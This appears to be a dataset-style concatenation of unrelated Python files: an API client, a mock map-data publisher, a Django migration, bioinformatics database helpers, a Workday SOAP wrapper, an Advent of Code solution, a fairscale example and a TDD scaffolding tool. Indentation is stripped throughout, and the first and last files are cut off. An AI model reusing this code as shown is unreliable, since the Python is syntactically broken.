:param tran_type: The type of transaction retrieve. Valid values
are: waiver or pending_trade
:return: Response from the GET
"""
return self.get(
"league/{}/transactions;team_key={};type={}".format(
league_id, team_key, tran_type))
def put_transaction(self, transaction_key, xml):
"""
PUT to the transaction API
This can be used to accept/reject trades, voting for/against a trade,
and editing a waiver claim.
:param xml: The XML document to send
:type xml: str
:return: Response from the PUT
"""
return self.put("transaction/" + str(transaction_key), xml)
def get_player_stats_raw(self, game_code, player_ids, req_type, date,
season):
"""
GET stats for a list of player IDs
:param game_code: The game code the players belong too. mlb, nhl, etc.
:type game_code: str
:param player_ids: Yahoo! player IDs we are requesting stats for
:type player_ids: list(int)
:param req_type: The request type. This defines the range of dates to
return the stats for.
:param date: When req_type == 'date', this is the date we want the
stats for. If None, we'll get the stats for the current date.
:type date: datetime.date
:param season: When req_type == 'season', this is the season we want
the stats for. If None, we'll get the stats for the current season
:type season: int
:return: Response from the GET call
"""
uri = self._build_player_stats_uri(game_code, player_ids, req_type,
date, season)
return self.get(uri)
def _build_player_stats_uri(self, game_code, player_ids, req_type, date,
season):
uri = 'players;player_keys='
if type(player_ids) is list:
for i, p in enumerate(player_ids):
if i != 0:
uri += ","
uri += "{}.p.{}".format(game_code, p)
uri += "/stats;{}".format(self._get_stats_type(req_type, date, season))
return uri
def _get_stats_type(self, req_type, date, season):
if req_type == 'season':
if season is None:
return "type=season"
else:
return "type=season;season={}".format(season)
elif req_type == 'date':
if date is None:
date = datetime.date.today()
if type(date) is datetime.date or type(date) is datetime.datetime:
return "type=date;date={}".format(date.strftime("%Y-%m-%d"))
else:
return "type=date;date={}".format(date)
elif req_type in ['lastweek', 'lastmonth']:
return "type={}".format(req_type)
else:
assert(False), "Unknown req_type type: {}".format(req_type)
def get_standings_raw(self, league_id, week=None):
"""Return the raw JSON when requesting the scoreboard for a week
:param league_id: League ID to get the standings for
:type league_id: str
:param week: The week number to request the scoreboard for
:type week: int
:return: JSON document of the request.
"""
week_uri = ""
if week is not None:
week_uri = ";week={}".format(week)
return self.get("league/{}/standings{}".format(league_id, week_uri))
def get_transactions(self, league_id):
"""Return the raw JSON when requesting the scoreboard for a week
:param league_id: League ID to get the standings for
:type league_id: str
:param week: The week number to request the scoreboard for
:type week: int
:return: JSON document of the request.
"""
return self.get("league/{}/transactions".format(league_id))
def get_draft_results(self, league_id):
# /fantasy/v2/league/{league_key}/draftresults
return self.get("league/{}/draftresults".format(league_id))
|
python
|
#!/usr/bin/env python3
import os
import time
import math
import atexit
import numpy as np
import threading
import random
import cereal.messaging as messaging
import argparse
from common.params import Params
from common.realtime import Ratekeeper
import queue
import requests
import cereal.messaging.messaging_pyx as messaging_pyx
import datetime
import json
def main():
rk = Ratekeeper(5.0, print_delay_threshold=None)
pm = messaging.PubMaster(['liveMapData'])
while 1:
time.sleep(1)
speed_limit = 60.0
has_exit = True
dist_to_next_step = 1000.0
remain_dist = 2500.0
nav_icon = 2
dat = messaging.new_message('liveMapData')
dat.valid = True
# struct LiveMapData {
# speedLimitValid @0 :Bool;
# speedLimit @1 :Float32;
# speedAdvisoryValid @12 :Bool;
# speedAdvisory @13 :Float32;
# speedLimitAheadValid @14 :Bool;
# speedLimitAhead @15 :Float32;
# speedLimitAheadDistance @16 :Float32;
# curvatureValid @2 :Bool;
# curvature @3 :Float32;
# wayId @4 :UInt64;
# roadX @5 :List(Float32);
# roadY @6 :List(Float32);
# lastGps @7: GpsLocationData;
# roadCurvatureX @8 :List(Float32);
# roadCurvature @9 :List(Float32);
# distToTurn @10 :Float32;
# mapValid @11 :Bool;
# }
live_map_data = dat.liveMapData
live_map_data.speedLimit = speed_limit * 1.08
live_map_data.distToTurn = dist_to_next_step
live_map_data.speedAdvisoryValid = has_exit
live_map_data.speedAdvisory = remain_dist
live_map_data.wayId = nav_icon
pm.send('liveMapData', dat)
#sm.update()
rk.keep_time()
if __name__ == "__main__":
main()
|
python
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.timezone
from django.conf import settings
import uuid
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('contenttypes', '0002_remove_content_type_name'),
]
operations = [
migrations.CreateModel(
name='Badge',
fields=[
('id', models.AutoField(verbose_name='ID', auto_created=True, primary_key=True, serialize=False)),
('name', models.CharField(max_length=150)),
('slug', models.CharField(max_length=150)),
('priority', models.IntegerField(default=1)),
],
),
migrations.CreateModel(
name='Offer',
fields=[
('id', models.AutoField(verbose_name='ID', auto_created=True, primary_key=True, serialize=False)),
('description', models.TextField()),
('requirements', models.TextField()),
('time_commitment', models.TextField()),
('benefits', models.TextField()),
('location', models.CharField(max_length=150)),
('title', models.CharField(max_length=150)),
('started_at', models.DateTimeField(blank=True, null=True)),
('finished_at', models.DateTimeField(blank=True, null=True)),
('time_period', models.CharField(blank=True, default='', max_length=150)),
('status_old', models.CharField(default='NEW', max_length=30, null=True)),
('offer_status', models.CharField(default='unpublished', choices=[('unpublished', 'Unpublished'), ('published', 'Published'), ('rejected', 'Rejected')], max_length=16)),
('recruitment_status', models.CharField(default='open', choices=[('open', 'Open'), ('supplemental', 'Supplemental'), ('closed', 'Closed')], max_length=16)),
('action_status', models.CharField(default='ongoing', choices=[('future', 'Future'), ('ongoing', 'Ongoing'), ('finished', 'Finished')], max_length=16)),
('votes', models.BooleanField(default=0)),
('recruitment_start_date', models.DateTimeField(blank=True, null=True)),
('recruitment_end_date', models.DateTimeField(blank=True, null=True)),
('reserve_recruitment', models.BooleanField(default=True)),
('reserve_recruitment_start_date', models.DateTimeField(blank=True, null=True)),
('reserve_recruitment_end_date', models.DateTimeField(blank=True, null=True)),
('action_ongoing', models.BooleanField(default=False)),
('constant_coop', models.BooleanField(default=False)),
('action_start_date', models.DateTimeField(blank=True, null=True)),
('action_end_date', models.DateTimeField(blank=True, null=True)),
('volunteers_limit', models.IntegerField(blank=True, default=0, null=True)),
],
),
migrations.CreateModel(
name='OfferImage',
fields=[
('id', models.AutoField(verbose_name='ID', auto_created=True, primary_key=True, serialize=False)),
('path', models.ImageField(upload_to='offers/')),
('is_main', models.BooleanField(default=False)),
('created_at', models.DateTimeField(auto_now_add=True)),
('offer', models.ForeignKey(to='volontulo.Offer')),
],
),
migrations.CreateModel(
name='Organization',
fields=[
('id', models.AutoField(verbose_name='ID', auto_created=True, primary_key=True, serialize=False)),
('name', models.CharField(max_length=150)),
('address', models.CharField(max_length=150)),
('description', models.TextField()),
],
),
migrations.CreateModel(
name='OrganizationGallery',
fields=[
('id', models.AutoField(verbose_name='ID', auto_created=True, primary_key=True, serialize=False)),
('path', models.ImageField(upload_to='gallery/')),
('is_main', models.BooleanField(default=False)),
('organization', models.ForeignKey(to='volontulo.Organization', related_name='images')),
],
),
migrations.CreateModel(
name='UserBadges',
fields=[
('id', models.AutoField(verbose_name='ID', auto_created=True, primary_key=True, serialize=False)),
('created_at', models.DateTimeField(blank=True, default=django.utils.timezone.now)),
('description', models.CharField(max_length=255)),
('counter', models.IntegerField(blank=True, default=0)),
('badge', models.ForeignKey(to='volontulo.Badge')),
('content_type', models.ForeignKey(null=True, to='contenttypes.ContentType')),
],
),
migrations.CreateModel(
name='UserGallery',
fields=[
('id', models.AutoField(verbose_name='ID', auto_created=True, primary_key=True, serialize=False)),
('image', models.ImageField(upload_to='profile/')),
('is_avatar', models.BooleanField(default=False)),
],
),
migrations.CreateModel(
name='UserProfile',
fields=[
('id', models.AutoField(verbose_name='ID', auto_created=True, primary_key=True, serialize=False)),
('is_administrator', models.BooleanField(default=False)),
('uuid', models.UUIDField(default=uuid.uuid4, unique=True)),
('badges', models.ManyToManyField(to='volontulo.Badge', through='volontulo.UserBadges', related_name='user_profile')),
('organizations', models.ManyToManyField(to='volontulo.Organization', related_name='userprofiles')),
('user', models.OneToOneField(to=settings.AUTH_USER_MODEL)),
],
),
migrations.AddField(
model_name='usergallery',
name='userprofile',
field=models.ForeignKey(to='volontulo.UserProfile', related_name='images'),
),
migrations.AddField(
model_name='userbadges',
name='userprofile',
field=models.ForeignKey(to='volontulo.UserProfile', db_column='userprofile_id'),
),
migrations.AddField(
model_name='organizationgallery',
name='published_by',
field=models.ForeignKey(to='volontulo.UserProfile', related_name='gallery'),
),
migrations.AddField(
model_name='offerimage',
name='userprofile',
field=models.ForeignKey(to='volontulo.UserProfile', related_name='offerimages'),
),
migrations.AddField(
model_name='offer',
name='organization',
field=models.ForeignKey(to='volontulo.Organization'),
),
migrations.AddField(
model_name='offer',
name='volunteers',
field=models.ManyToManyField(to=settings.AUTH_USER_MODEL),
),
]
|
python
|
"""
Copyright [2009-2019] EMBL-European Bioinformatics Institute
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sqlalchemy as sa
import psycopg2
from . import DatabaseConnectionError, SQLError
from .models import InfernalResult
async def set_infernal_job_results(engine, job_id, results):
"""
Save infernal results
:param engine: params to connect to the db
:param job_id: id of the job
:param results: data from the deoverlapped file
:return: id of the infernal_job. It will be used to get the result and save the alignment
"""
try:
async with engine.acquire() as connection:
try:
query = sa.text('''
SELECT id
FROM infernal_job
WHERE job_id=:job_id
''')
async for row in await connection.execute(query, job_id=job_id):
infernal_job_id = row.id
break
for result in results:
result['infernal_job_id'] = infernal_job_id
await connection.execute(InfernalResult.insert().values(results))
return infernal_job_id
except Exception as e:
raise SQLError("Failed to set_infernal_job_results in the database, "
"job_id = %s" % job_id) from e
except psycopg2.Error as e:
raise DatabaseConnectionError("Failed to open connection to the database in set_infernal_job_results, "
"job_id = %s" % job_id) from e
async def get_infernal_result_id(engine, infernal_job_id, item):
"""
Get infernal_result id
:param engine: params to connect to the db
:param infernal_job_id: id of the infernal_job
:param item: dict with values to find the id of the infernal_result
:return: id of the infernal_result
"""
try:
async with engine.acquire() as connection:
try:
query = sa.text('''
SELECT id
FROM infernal_result
WHERE infernal_job_id=:infernal_job_id AND accession_rfam=:accession_rfam AND mdl_from=:mdl_from
AND mdl_to=:mdl_to AND seq_from=:seq_from AND seq_to=:seq_to AND gc=:gc AND score=:score
AND e_value=:e_value
''')
infernal_result_id = None
async for row in await connection.execute(
query, infernal_job_id=infernal_job_id, accession_rfam=item['accession_rfam'],
mdl_from=item['mdl_from'], mdl_to=item['mdl_to'], seq_from=item['seq_from'],
seq_to=item['seq_to'], gc=item['gc'], score=item['score'], e_value=item['e_value']):
infernal_result_id = row.id
break
return infernal_result_id
except Exception as e:
raise SQLError("Failed to get_infernal_result_id in the database, "
"infernal_job_id = %s" % infernal_job_id) from e
except psycopg2.Error as e:
raise DatabaseConnectionError("Failed to open connection to the database in get_infernal_result_id, "
"infernal_job_id = %s" % infernal_job_id) from e
async def save_alignment(engine, infernal_result_id, alignment):
"""
Save the alignment
:param engine: params to connect to the db
:param infernal_result_id: id of the infernal_result
:param alignment: alignment to be saved
"""
try:
async with engine.acquire() as connection:
try:
query = sa.text('''
UPDATE infernal_result SET alignment=:alignment
WHERE id=:infernal_result_id
''')
await connection.execute(query, alignment=alignment, infernal_result_id=infernal_result_id)
except Exception as e:
raise SQLError("Failed to save_alignment in the database, "
"infernal_result_id = %s" % infernal_result_id) from e
except psycopg2.Error as e:
raise DatabaseConnectionError("Failed to open connection to the database in save_alignment, "
"infernal_result_id = %s" % infernal_result_id) from e
|
python
|
# -*- coding: utf-8 -*-
# Licensed to Anthony Shaw ([email protected]) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import zeep
import zeep.exceptions
import zeep.transports
from .exceptions import WorkdaySoapApiError
class WorkdayResponse(object):
"""
Response from the Workday API
"""
def __init__(self, response, service, method, called_args, called_kwargs):
"""
:param response: The response from the API
:type response: ``dict``
:param service: The web service that was callled
:type service: :class:`zeep.proxy.ServiceProxy`
:param method: The name of the web method called
:type method: ``str``
:param called_args: The arguments that were used to call the method
:type called_args: ``list``
:param called_kwargs: The keyword-arguments that were used to call the method
:type called_kwargs: ``dict``
"""
self.service = service
self.method = method
self.called_args = called_args
self.called_kwargs = called_kwargs
self._response = response
def __iter__(self):
return self
def __next__(self):
"""
Use the iterator protocol as a way of returning paged
result sets
"""
if self.page == self.total_pages:
raise StopIteration
else:
# Add paging params if not already existing
if "Response_Filter" not in self.called_kwargs:
self.called_kwargs["Response_Filter"] = {"Page": self.page + 1}
else:
if "Page" in self.called_kwargs["Response_Filter"]:
self.called_kwargs["Response_Filter"]["Page"] += 1
else:
self.called_kwargs["Response_Filter"]["Page"] = self.page + 1
result = getattr(self.service, self.method)(
*self.called_args, **self.called_kwargs
)
self._response = result
return WorkdayResponse(
result,
service=self.service,
method=self.method,
called_args=self.called_args,
called_kwargs=self.called_kwargs,
)
def next(self):
return self.__next__()
@property
def references(self):
return self._response.get("Request_References", None)
@property
def filter(self):
return self._response.get("Response_Filter", None)
@property
def total_results(self):
# For some reason, response_results can be a list for some API
# So we index into a list if we have to
if isinstance(self._response["Response_Results"], list):
return int(self._response["Response_Results"][0]["Total_Results"])
return int(self._response["Response_Results"]["Total_Results"])
@property
def total_pages(self):
return int(self._response["Response_Results"]["Total_Pages"])
@property
def page_results(self):
return int(self._response["Response_Results"]["Page_Results"])
@property
def page(self):
return int(self._response["Response_Results"]["Page"])
@property
def data(self):
return self._response["Response_Data"]
class BaseSoapApiClient(object):
def __init__(self, name, session, wsdl_url, authentication, proxy_url=None, strict=True):
"""
:param name: Name of this API
:type name: ``str``
:param session: HTTP session to use for communication
:type session: :class:`requests.Session`
:param wsdl_url: Path to the WSDL
:type wsdl_url: ``str``
:param authentication: Authentication configuration
:type authentication: :class:`workday.auth.BaseAuthentication`
:param proxy_url: (Optional) HTTP Proxy URL
:type proxy_url: ``str``
"""
auth_kwargs = authentication.kwargs
settings = zeep.Settings(strict=strict)
self._client = zeep.Client(
wsdl=wsdl_url,
transport=zeep.transports.Transport(session=session),
settings=settings,
**auth_kwargs
)
def __getattr__(self, attr):
"""
Wrapper around the SOAP client service methods.
Converts responses to a :class:`WorkdayResponse` instance
:rtype: :class:`WorkdayResponse`
"""
def call_soap_method(*args, **kwargs):
try:
result = getattr(self._client.service, attr)(*args, **kwargs)
return WorkdayResponse(
result,
service=self._client.service,
method=attr,
called_args=args,
called_kwargs=kwargs,
)
except zeep.exceptions.Fault as fault:
raise WorkdaySoapApiError(fault)
return call_soap_method
|
python
|
from datetime import datetime
from caselawclient.Client import api_client
from requests_toolbelt.multipart import decoder
from .models import SearchResults
def format_date(date):
if date == "" or date is None:
return None
time = datetime.strptime(date, "%Y-%m-%d")
return time.strftime("%d-%m-%Y")
def perform_advanced_search(
query=None,
court=None,
judge=None,
party=None,
order=None,
neutral_citation=None,
specific_keyword=None,
date_from=None,
date_to=None,
page=1,
):
response = api_client.advanced_search(
q=query,
court=court,
judge=judge,
party=party,
neutral_citation=neutral_citation,
specific_keyword=specific_keyword,
page=page,
order=order,
date_from=date_from,
date_to=date_to,
)
multipart_data = decoder.MultipartDecoder.from_response(response)
return SearchResults.create_from_string(multipart_data.parts[0].text)
|
python
|
""" https://adventofcode.com/2018/day/6 """
def readFile():
with open(f"{__file__.rstrip('code.py')}input.txt", "r") as f:
lines = [line[:-1].split(", ") for line in f.readlines()]
return [Point(int(line[0]), int(line[1])) for line in lines]
class Point:
n = 0
def __init__(self, x, y):
self.x = x
self.y = y
self.name = str(Point.n).zfill(3)
Point.n += 1
self.coords = (x, y)
self.isInfinite = False
def getDistance(self, x, y):
return abs(self.x - x) + abs(self.y - y)
def getMinimumOfDict(data : dict):
minVal = None
minID = None
for d in data:
if minVal is None or data[d] < minVal:
minVal = data[d]
minID = d
return minVal, minID
def part1(vals):
x, y = [val.x for val in vals], [val.y for val in vals]
minx, maxx, miny, maxy = min(x), max(x), min(y), max(y)
field = []
for y in range(miny, maxy + 1):
field.append([-1 for x in range(minx, maxx + 1)])
for y in range(miny, maxy + 1):
for x in range(minx, maxx + 1):
dist = {}
for val in vals:
dist[val.name] = val.getDistance(x, y)
minDist, point = getMinimumOfDict(dist)
if sum(value == minDist for value in dist.values()) == 1:
field[y-miny][x-minx] = point
points = {}
for y in range(miny, maxy + 1):
for x in range(minx, maxx + 1):
id = field[y-miny][x-minx]
if id == -1:
continue
if id in points:
points[id]["value"] += 1
if not points[id]["border"]:
points[id]["border"] = x == minx or x == maxx or y == miny or y == maxy
else:
points[id] = {
"value": 1,
"border": x == minx or x == maxx or y == miny or y == maxy
}
result = -1
for point in points:
if points[point]["border"]:
continue
if points[point]["value"] > result:
result = points[point]["value"]
return result
class Location:
maxDist = 0
def __init__(self, x, y):
self.distance = 0
self.x = x
self.y = y
self.inRegion = True
def addDistance(self, point):
self.distance += point.getDistance(self.x, self.y)
if self.distance >= Location.maxDist:
self.inRegion = False
def part2(vals, maxDist):
x, y = [val.x for val in vals], [val.y for val in vals]
minx, maxx, miny, maxy = min(x), max(x), min(y), max(y)
Location.maxDist = maxDist
locations = []
for j in range(miny, maxy + 1):
for i in range(minx, maxx + 1):
loc = Location(i, j)
for point in vals:
loc.addDistance(point)
locations.append(loc)
count = 0
for loc in locations:
if loc.inRegion:
count += 1
return count
if __name__ == "__main__":
vals, maxDist = readFile(), 10000
#vals, maxDist = [Point(1, 1), Point(1, 6), Point(8, 3), Point(3, 4),
# Point(5, 5), Point(8, 9)], 32
print(f"Part 1: {part1(vals)}")
print(f"Part 2: {part2(vals, maxDist)}")
|
python
|
import os
from helpers import dist_init, getData, getLossFun, getModel
import torch
import torch.distributed as dist
import torch.multiprocessing as mp
import torch.optim as optim
import fairscale
from fairscale.nn.model_parallel import initialize_model_parallel
DEVICE = "cuda" if torch.cuda.is_available() else "cpu"
RANK = 0 # example
def run(rank, world_size):
os.environ["MASTER_ADDR"] = "localhost"
os.environ["MASTER_PORT"] = "10638"
dist_init(rank, world_size)
os.environ["MASTER_PORT"] = "10639"
dist.rpc.init_rpc(f"worker{rank}", rank=rank, world_size=world_size)
initialize_model_parallel(1, world_size)
model = getModel()
data, target = getData()[0]
loss_fn = getLossFun()
device = torch.device("cuda", RANK) if DEVICE == "cuda" else torch.device("cpu")
model = fairscale.nn.Pipe(
model,
balance=[2, 1],
style=fairscale.nn.Pipe.MultiProcess,
worker_map={0: "worker0", 1: "worker1"}, # Needed to convert ranks to RPC worker names
input_device=device,
).to(device)
# define optimizer and loss function
optimizer = optim.SGD(model.parameters(), lr=0.001)
# zero the parameter gradients
optimizer.zero_grad()
# outputs and target need to be on the same device
# forward step
outputs = model(data.to(device))
# compute loss
if rank == 1:
loss = loss_fn(outputs.to(device), target.to(device))
# backward + optimize
loss.backward()
optimizer.step()
else:
model.back_helper(outputs)
print(f"Finished Training Step on {rank}")
del model
if __name__ == "__main__":
world_size = 2
mp.spawn(run, args=(world_size,), nprocs=world_size, join=True)
|
python
|
###############################################################################
# Copyright (c) 2021, Milan Neubert ([email protected])
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
###############################################################################
from TDDConfig import CTestPkgDescription
from TDDConfig import CTestConfig
from TDDConfig import CCovCfg
from TDDConfig import CStaticAnalysisCfg
from TDDConfig import CFormaterGuidelineCheckerCfg
from TDDConfig import CTestToolchainCfg
from TDDConfig import CCodeStatisticsCfg
from pathlib import Path
from datetime import datetime
import colorama
from colorama import Fore, Style
def checkIfFolderExists(pathFldr):
if not pathFldr.is_dir():
pathFldr.mkdir()
def boolToStr(valBool):
str_retVal = 'False'
if valBool:
str_retVal = 'True'
return str_retVal
def copyTxtFile(str_src, str_dst):
dest = Path(str_dst)
src = Path(str_src)
dest.write_text(src.read_text())
def readFileToStr(str_src: str):
retStr = ''
with open(str_src, 'r') as ftext:
retStr = ftext.read()
return retStr
def writeStringToFile(strVar,str_dst):
with open(str_dst, 'w') as ftext:
ftext.write(strVar)
def patchString(strVar,patchDict):
for key in patchDict.keys():
strVar = strVar.replace(key,patchDict[key])
return strVar
def timeInShortString():
now = datetime.now()
return now.strftime('%y%m%d%H%M%S')
def assertWithText(condition, text):
assert condition, text
def printout(text):
print(text)
def get_input(text):
return input(text)
def createFolder(str_folder):
'''
Function returning True when folder already exists or is succesfuly created.
False - file doesnt exist and mkdir failed.
'''
pHeaderFolder = Path(str_folder)
if not pHeaderFolder.is_dir():
pHeaderFolder.mkdir(mode=666,parents=True)
assertWithText(pHeaderFolder.is_dir(), 'Creating folder %s failed!' % (str_folder))
def processFile(str_src, str_dest, dic):
'''
Function copy file from src position to dest position. In file make changes when it find a key from dic rewrites by value.
'''
#1 open file and read to string variable
strVar = readFileToStr(str_src)
#2 patch string with dictionary
patchStrVar = patchString(strVar,dic)
#3 store string in file str_dest
writeStringToFile(patchStrVar,str_dest)
pass
def questionReturningPositiveInteger(questionText, default_uint=-1, forced_default=False):
if forced_default:
printout(questionText + ' Using forced default value[%i]' % (default_uint))
return default_uint
b_confirm = False
int_retVal = -1
while not b_confirm:
str_retVal = get_input(questionText + ' [Fill positive number(default is %i)]:' % (default_uint))
if "" == str_retVal:
int_retVal = default_uint
elif str_retVal.isdecimal():
int_retVal = int(str_retVal)
else:
printout('Invalid input try it again.')
continue
if 0 < int_retVal :
# b_confirm = questionYesNo('Confirm this value: %i' % (int_retVal))
b_confirm = True
return int_retVal
def questionReturnString(questionText):
'''
Function ask user to fill string value. User have to confirm his choice.
'''
#b_confirm = False
#str_retVal = ''
#while not b_confirm:
# str_retVal = get_input(questionText)
# b_confirm = questionYesNo('Confirm this value: %s' % (str_retVal))
#return str_retVal
return get_input(questionText)
def questionYesNo(QuestionOfText, default_val=True, forced_default = False):
if default_val:
str_def = 'yes'
else:
str_def = 'no'
if forced_default:
printout(QuestionOfText + ' Used default default value[%s]' % (str_def))
return default_val
bRetVal = False
while(1):
answer = get_input(QuestionOfText + ' [yes(y)|no(n)] (default %s):' % (str_def))
if answer == "yes" or answer == 'y':
bRetVal = True
break
elif answer == "no" or answer == 'n':
break
elif answer == '':
bRetVal = default_val
break
else:
printout("Incorrect input value.")
return (bRetVal)
def questionWithList(QuestionOfText,list,default):
str_RetVal = default
str_choises = ' | '.join(list)
while(1):
answer = get_input(QuestionOfText + " ( %s ) default[%s]:" % (str_choises, str_RetVal))
if answer == "":
printout('Using value: %s' % (str_RetVal))
break
elif answer in list:
str_RetVal = answer
break
else:
printout("Incorrect input value.")
return (str_RetVal)
class CreateNewModule():
str_SRC_FOLDER: str
str_SRC_FOLDER_REL: str
str_HEADER_FOLDER: str
str_HEADER_FOLDER_REL: str
str_FRAMEWORK: str
str_TOOLCHAIN: str
str_LANGUAGE: str
str_COMPONENT_NAME: str
str_SRC_TYPE: str
str_TPKG_FOLDER: str
copyFileLst: [(str,str)]
testConfig: CTestConfig
pkgDesc: CTestPkgDescription
def __init__(self, cTestPkgDesc: CTestPkgDescription):
self.str_SRC_FOLDER = ''
self.str_SRC_FOLDER_REL = ''
self.str_HEADER_FOLDER = ''
self.str_HEADER_FOLDER_REL = ''
self.str_SRC_FILE = ''
self.str_HEADER_FILE = ''
self.str_FRAMEWORK = "cpputest"
self.str_TOOLCHAIN = "mingw"
self.str_LANGUAGE = 'c++'
self.str_COMPONENT_NAME = ''
self.str_SRC_TYPE = ''
self.str_TPKG_FOLDER = ''
self.copyFileLst = []
self.testConfig = CTestConfig()
self.pkgDesc = cTestPkgDesc
pass
def createAndCopyFiles(self):
self.createHeaderFile()
self.createSourceFile()
self.copyAndCreateTestFiles()
self.copyAndCreateMemLeakMacroFiles()
self.createTestInitFile()
self.createTestCMakefile()
pass
def setModuleConfiguration(self):
'''
This function create configuration for creating new module.
Result will be definition of files, type of source code.
Complete test configuration
Function explanation:
1) define what type of module we want to create. c/c++
2) define SUT file Configuration
a) Name, name of class or pkg
b) Define name of files NAME.suffix for hdr and scr
3) define test configuration for additional steps
'''
# define src folder
## question if user wants to create C or C++
printout('')
self.str_LANGUAGE = questionWithList("What type of code will be the new module?", ['c++','c'], 'c++')
printout(Fore.GREEN + 'Definition of SUT Files configuration' + Style.RESET_ALL)
self.defineSutFileConfiguration()
printout(Fore.GREEN + 'Definition of coverage check' + Style.RESET_ALL)
self.defineCoverageCfg()
printout(Fore.GREEN + 'Definition of static analysis check' + Style.RESET_ALL)
self.defineStatAnalysisCfg()
printout(Fore.GREEN + 'Definition of toolchain for test' + Style.RESET_ALL + ' (Default)')
self.defineToolchainCfg()
printout(Fore.GREEN + 'Definition of code statistics check' + Style.RESET_ALL)
self.defineCodeStatisticsCfg()
pass
def createNewModule(self):
'''
This function create new module according user ideas.
1) First user define how it should look like.
2) Create new SUT object header and source file.
3) Create new test package folder and fill with default files and user configurations.
'''
colorama.init()
printout(Fore.YELLOW + 'Creating new module' + Style.RESET_ALL)
printout(Fore.CYAN + 'Definition of module:' + Style.RESET_ALL)
self.setModuleConfiguration()
printout(Fore.CYAN + 'Checking/Creating SUT folder' + Style.RESET_ALL)
self.createFolder_SUT()
printout(Fore.CYAN + 'Checking/Creating TPKG folder' + Style.RESET_ALL)
self.createFolder_TPKG()
printout(Fore.CYAN + 'Copying/Creating TPKG files' + Style.RESET_ALL)
self.createAndCopyFiles()
pass
def defineSutFileConfiguration(self):
'''
Function have to create filenames, and folder where will be placed.
'''
# this fill self.str_SRC_FILE
# self.str_HEADER_FILE
self.defineSutFileNames()
# this fill self.str_SRC_FOLDER
# self.str_HEADER_FOLDER
self.defineSutFolders()
pass
def createFolder_SUT(self):
'''
This function check if exist SUT folders. If not create them.
'''
createFolder(self.str_HEADER_FOLDER)
createFolder(self.str_SRC_FOLDER)
def createFolder_TPKG(self):
'''
This function create TPKG folder and subfolder.
When TPKG folder exist, create new and push current date
in to the name.
'''
pTpkgFldr = Path(self.pkgDesc.str_testpath) / (self.str_COMPONENT_NAME + self.pkgDesc.str_testfldr_suffix)
if pTpkgFldr.is_dir():
pTpkgFldr = Path(self.pkgDesc.str_testpath) / (self.str_COMPONENT_NAME + timeInShortString() + self.pkgDesc.str_testfldr_suffix)
self.str_TPKG_FOLDER = str(pTpkgFldr)
createFolder(self.str_TPKG_FOLDER)
createFolder(str(pTpkgFldr / self.pkgDesc.str_srctestfldr))
def defineSutFileNames(self):
'''
Function create name of files for sut. Header and Source
Name of files will be stored in as attribute.
'''
str_srcsuff = ''
str_headersuff = ''
printout("New SUT object definition:")
if self.str_LANGUAGE == 'c++':
str_srcsuff = questionWithList('Choose suffix for src file.',['cpp', 'CPP', 'cc', 'CC'],'cpp')
#print(str_srcsuff)
str_headersuff = questionWithList('Choose suffix for header file.',['hpp','HPP','h','H'],'hpp')
#print(str_headersuff)
elif self.str_LANGUAGE == 'c':
str_srcsuff = questionWithList('Choose suffix for src file.',['c', 'C'],'c')
str_headersuff = questionWithList('Choose suffix for header file.',['h','H'],'h')
pass
else:
assert False, 'Currently not supported source file type.'
self.str_COMPONENT_NAME = questionReturnString('Define class/module name: ')
#print([self.str_COMPONENT_NAME,str_srcsuff])
str_fullSrcName = '.'.join([self.str_COMPONENT_NAME,str_srcsuff])
str_fullHeaderName = '.'.join([self.str_COMPONENT_NAME,str_headersuff])
printout("New SUT file are: \n\t%s\n\t%s" % (str_fullHeaderName, str_fullSrcName))
if not questionYesNo('Are names correct?', forced_default=True):
str_fullHeaderName = questionReturnString('Define full name for header (name.suff).')
str_fullSrcName = questionReturnString('Define full name for source (name.suff).')
self.str_SRC_FILE = str_fullSrcName
self.str_HEADER_FILE = str_fullHeaderName
def defineSutFolders(self):
'''
Function define position of sut files(header and source)
There will be some default choise but user can define. Specific for header and source.
HeaderFolder and SourceFolder will be stored as attribute
'''
self.str_SRC_FOLDER_REL = 'src'
self.str_HEADER_FOLDER_REL = 'include'
